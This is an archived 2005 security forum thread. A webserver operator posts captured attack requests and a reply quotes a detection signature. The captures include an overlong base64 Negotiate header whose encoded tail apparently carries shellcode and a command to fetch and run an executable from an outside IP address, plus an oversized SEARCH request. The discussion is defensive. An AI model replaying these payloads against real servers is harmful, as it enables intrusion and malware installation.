Go Back   Wireless and Wifi Forums > News > Newsgroups > comp.security.misc
webserver attack attempt

webserver attack attempt

webserver attack attempt. Discuss webserver attack attempt, on Wireless Forums.

Register FAQ Members List Calendar Search Today's Posts Mark Forums Read

Reply
 
LinkBack Thread Tools Display Modes
  #1 (permalink)  
Old 07-14-2005, 12:24 PM
yarmfelder@yahoo.com
Guest
  
Posts: n/a
Default webserver attack attempt
I've got some people who are trying to attack my
webserver, which is not Apache. But I would guess
they think it is, or perhaps they think it is
M$.

What they do is one of two things: either
they will send an HTTP request that is far too
short, or one that is far too long. An example
of the long kind:

GET / HTTP/1.0
Authorization: Negotiate
YIIQegYGKwYBBQUCoIIQbjCCEGqhghBmI4IQYgOCBAEAQUFBQU FBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQQMAI4I
MVwOCBAoAkEKQQpBCkEKBxFTy///86EYAAACLRTyLfAV4Ae+LTxiLXyAB6+MuSYs0iwHuMcCZrITAd Af
Byg0Bwuv0O1QkBHXji18kAetmiwxLi18cAeuLHIsB64lcJATDM cBki0AwhcB4D4tADItwHK2LaAjpCwA
AAItANAV8AAAAi2g8XzH2YFbrDWjvzuBgaJj+ig5X/+fo7v///2NtZCAvYyB0ZnRwIC1pIDcwLjI2LjI
yOS4xMDQgR0VUIHdjbnNmdHkuZXhlJnN0YXJ0IHdjbnNmdHkuZ XhlJmV4aXQAQkJCQkJCQkJCQkJCQkJ

.... and it goes on from there, beyond the maximum number of
bytes that is allowed. Of course, this has no effect, because
it's a well written server. But I suppose that if someone were
to decode that string, they might find some runnable code in
there.

Another long one follows. Notice it is neither GET nor POST.

SEARCH
/.^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^ B±^B±^B
±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^ B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^
B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B± ^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±
^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B ±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B
±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^ B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^
B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B± ^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±
^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B ±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B
±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^ B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^
B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B± ^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±
^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B ±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B
±
....etc.

YF


Reply With Quote
  #2 (permalink)  
Old 07-14-2005, 03:11 PM
Newsgroup Poster
Guest
  
Posts: n/a
Default Re: webserver attack attempt
Hope this is of help:

http://translate.google.com/translat...D%26safe%3Doff


2005/06/04 Attempt of cash server C -> S TCP 80 or 8080 ? " HTTP/1 " and " Authorization:
Negotiate " and
" YIIQegYGKwYBBQUCoIIQbjC$$C$$EGqhghBmI4IQYgcOcbaeaq ufbqufbquf "



http://216.239.59.104/search?q=cache...hl=en&start=10

<yarmfelder@yahoo.com> wrote in message
news:1121343858.747793.261330@g47g2000cwa.googlegr oups.com...
I've got some people who are trying to attack my
webserver, which is not Apache. But I would guess
they think it is, or perhaps they think it is
M$.

What they do is one of two things: either
they will send an HTTP request that is far too
short, or one that is far too long. An example
of the long kind:

GET / HTTP/1.0
Authorization: Negotiate
YIIQegYGKwYBBQUCoIIQbjCCEGqhghBmI4IQYgOCBAEAQUFBQU FBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQQMAI4I
MVwOCBAoAkEKQQpBCkEKBxFTy///86EYAAACLRTyLfAV4Ae+LTxiLXyAB6+MuSYs0iwHuMcCZrITAd Af
Byg0Bwuv0O1QkBHXji18kAetmiwxLi18cAeuLHIsB64lcJATDM cBki0AwhcB4D4tADItwHK2LaAjpCwA
AAItANAV8AAAAi2g8XzH2YFbrDWjvzuBgaJj+ig5X/+fo7v///2NtZCAvYyB0ZnRwIC1pIDcwLjI2LjI
yOS4xMDQgR0VUIHdjbnNmdHkuZXhlJnN0YXJ0IHdjbnNmdHkuZ XhlJmV4aXQAQkJCQkJCQkJCQkJCQkJ

.... and it goes on from there, beyond the maximum number of
bytes that is allowed. Of course, this has no effect, because
it's a well written server. But I suppose that if someone were
to decode that string, they might find some runnable code in
there.

Another long one follows. Notice it is neither GET nor POST.

SEARCH
/.^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^ B±^B±^B
±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^ B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^
B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B± ^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±
^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B ±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B
±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^ B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^
B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B± ^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±
^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B ±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B
±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^ B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^
B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B± ^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±
^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B ±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B
±
....etc.

YF



Reply With Quote
Reply

« What is "uploads on eh.robis.net" in Network Nethood/Neighborhood/Places? | NESSUS:error while loading shared libraries: libnasl.so.2 »
Thread Tools
Display Modes
Linear Mode Linear Mode

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
BB code is On
Smilies are Off
[IMG] code is Off
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On
Forum Jump

Similar Threads
Thread Thread Starter Forum Replies Last Post
"Definition" of DoS attack (specifically, PPPoE and DHCP) R@nsh! comp.security.misc 1 03-10-2007 01:16 AM
U.S. warns of possible Qaeda financial cyber attack 1 hour, 1 minute ago spamhotmail@yahoo.com comp.security.misc 0 11-30-2006 11:45 PM
Microsoft Warns of PowerPoint Attack imhotep comp.security.misc 2 10-16-2006 03:34 AM
Microsoft patch opens users to attack imhotep comp.security.misc 25 09-01-2006 10:37 PM
HTTP attack or not? Bush is a Fascist alt.computer.security 0 08-12-2005 12:13 PM


All times are GMT. The time now is 08:50 PM.

Contact Us - Wireless Support Forum - Archive - Top - Noodles' Blog - Health Forums - Bike Forums - Cooking Junkies Forums

Powered by vBulletin® Version 3.7.1
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd.
Content Relevant URLs by vBSEO 3.2.0 RC8

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45